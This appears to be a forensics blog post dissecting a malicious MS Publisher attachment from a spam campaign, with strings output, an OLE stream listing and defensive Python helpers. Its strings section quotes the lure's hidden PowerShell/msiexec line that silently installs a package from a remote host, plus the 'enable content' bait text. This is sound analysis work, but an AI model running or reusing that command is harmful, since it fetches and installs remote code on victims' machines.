PUB File
Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before). The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself. MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.
Why would I bother doing this? For one, I believe that there is a good bit of value that goes unrealized when we don't look at artifacts like this, value that may not be immediately apparent to a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
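As a rough illustration of the 'strings' step, here is a minimal Python sketch that pulls both ASCII and UTF-16LE strings out of a blob of bytes. It is not the tool I ran; the function name extract_strings and the minimum length of 4 are assumptions made for the example. The UTF-16LE pass matters because OLE files store a good deal of their text as 16-bit characters, which an ASCII-only search will skip.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII and UTF-16LE strings of at least min_len characters."""
    # Runs of printable ASCII bytes.
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # Runs of printable ASCII characters, each followed by a NUL byte (UTF-16LE).
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)

    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


if __name__ == "__main__":
    sample = b"\x00\x01comodostar\x00\x02" + "Shceduled update task".encode("utf-16-le")
    for s in extract_strings(sample):
        print(s)
```

To run it against a real file, read the file in binary mode and pass the bytes to extract_strings.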
One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file. What this means is that the streams themselves are not necessarily contiguous, and that strings contained in the file may be split across sectors. For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching the raw file for the full string may not find all instances of it. Further, the macros themselves are compressed, throwing another monkey wrench into string searches.
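The sector issue is easy to demonstrate with a small simulation. The sketch below does not parse a real OLE file; it ignores the header and the sector allocation tables, and the helper names scatter and reassemble are made up for the example. It places a stream in two non-adjacent 512-byte sectors so that "alabama" straddles the boundary, then compares a raw search against a search of the reassembled stream.

```python
SECTOR_SIZE = 512  # sector size used by version 3 OLE files


def scatter(stream: bytes, chain: list, total_sectors: int) -> bytes:
    """Simulate a file body: write `stream` into the sectors named in `chain`."""
    image = bytearray(SECTOR_SIZE * total_sectors)
    for index, sector in enumerate(chain):
        piece = stream[index * SECTOR_SIZE:(index + 1) * SECTOR_SIZE]
        start = sector * SECTOR_SIZE
        image[start:start + len(piece)] = piece
    return bytes(image)


def reassemble(image: bytes, chain: list, size: int) -> bytes:
    """Follow the sector chain in order and rebuild the logical stream."""
    data = b"".join(image[s * SECTOR_SIZE:(s + 1) * SECTOR_SIZE] for s in chain)
    return data[:size]


# "alabama" starts at offset 509, so "ala" ends sector 0 and "bama" starts the next one.
stream = b"A" * 509 + b"alabama" + b"B" * 100
chain = [0, 3]  # the stream lives in sectors 0 and 3; sectors 1 and 2 belong to something else
image = scatter(stream, chain, total_sectors=4)

print(image.find(b"alabama"))                                   # -1: raw search misses it
print(reassemble(image, chain, len(stream)).find(b"alabama"))   # 509: found once reassembled
```

In a real file, the chain would come from the file's sector allocation table, which is why parsing the structure first and then searching each stream is more reliable than searching the raw bytes.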
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
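One way to pivot on the misspelling is to sweep a collection of scheduled task definitions for it. The following is a sketch only: the function name find_tasks_with_text is hypothetical, and it assumes you have task XML files available in a directory (for example, files collected from C:\Windows\System32\Tasks on the systems of interest). Task files are typically UTF-16, so the sketch tries that encoding first and falls back to UTF-8.

```python
from pathlib import Path


def find_tasks_with_text(task_dir, needle="Shceduled"):
    """Return paths of files under task_dir whose text contains needle (case-insensitive)."""
    hits = []
    wanted = needle.lower()
    for path in Path(task_dir).rglob("*"):
        if not path.is_file():
            continue
        try:
            raw = path.read_bytes()
        except OSError:
            continue  # unreadable file; skip it rather than abort the sweep
        # Try UTF-16 first (common for task XML), then UTF-8.
        for encoding in ("utf-16", "utf-8"):
            try:
                text = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if wanted in text.lower():
                hits.append(str(path))
                break
    return sorted(hits)
```

Calling find_tasks_with_text on a folder of collected task files returns the paths of any tasks whose definition includes the misspelled word, which can then be reviewed by hand.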
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
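The dates shown for the storages come from the OLE directory entries, which record timestamps as 64-bit FILETIME values (a count of 100-nanosecond intervals since 1 Jan 1601 UTC). For anyone working with the raw values, here is a small conversion sketch; the function names are mine, and whether a given tool displays these times in UTC or local time is something to verify for that tool.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals from this instant.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a 64-bit FILETIME value to a timezone-aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(moment: datetime) -> int:
    """Convert a timezone-aware datetime to a FILETIME value."""
    delta = moment - FILETIME_EPOCH
    seconds = delta.days * 86400 + delta.seconds
    return seconds * 10_000_000 + delta.microseconds * 10


if __name__ == "__main__":
    # Round-trip the timestamp seen in the output above, treated here as UTC.
    stamp = datetime(2018, 11, 20, 14, 40, 11, tzinfo=timezone.utc)
    print(filetime_to_datetime(datetime_to_filetime(stamp)).isoformat())
```

Normalizing these values to one format makes it easier to line up creation dates across a set of related samples.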
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured, and don't appear to do much at all; the malicious functionality appears to be embedded someplace else within the file itself.
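Macro source has to be decompressed before it can be read, which is part of what tools like oledump.py do for you. The sketch below is my own minimal take on the decompression routine described in the MS-OVBA specification, not code taken from any of those tools. It does very little validation, and it expects only the compressed container bytes; locating where that container begins within a module stream (the offset is recorded in the dir stream) is left out.

```python
def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA compressed container (sketch, minimal validation)."""
    if not container or container[0] != 0x01:
        raise ValueError("compressed container must start with signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3       # total size, including the 2-byte header
        is_compressed = bool(header & 0x8000)
        chunk_end = min(pos + chunk_size, len(container))
        pos += 2
        if not is_compressed:
            out += container[pos:chunk_end]      # raw chunk: bytes are copied as-is
            pos = chunk_end
            continue
        chunk_start = len(out)                   # where this chunk's output begins
        while pos < chunk_end:
            flags = container[pos]               # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(container[pos])   # literal byte
                    pos += 1
                    continue
                token = int.from_bytes(container[pos:pos + 2], "little")
                pos += 2
                # The offset/length bit split depends on how much output the chunk has so far.
                bit_count = max((len(out) - chunk_start - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):
                    out.append(out[-offset])     # byte-by-byte so overlapping copies work
    return bytes(out)
```

A quick check is a hand-built container such as bytes.fromhex("0103b002610400"), which holds one literal "a" followed by a copy token repeating it seven times, so the result is eight "a" characters.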
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as with other "weaponized" documents, including OLE-format Word and Publisher documents. Using techniques similar to those Steve employed, including Yara rules to conduct a VT retro-hunt, a profile can be built out using not just information collected from the individual files themselves, but also information provided by VT, such as submission dates.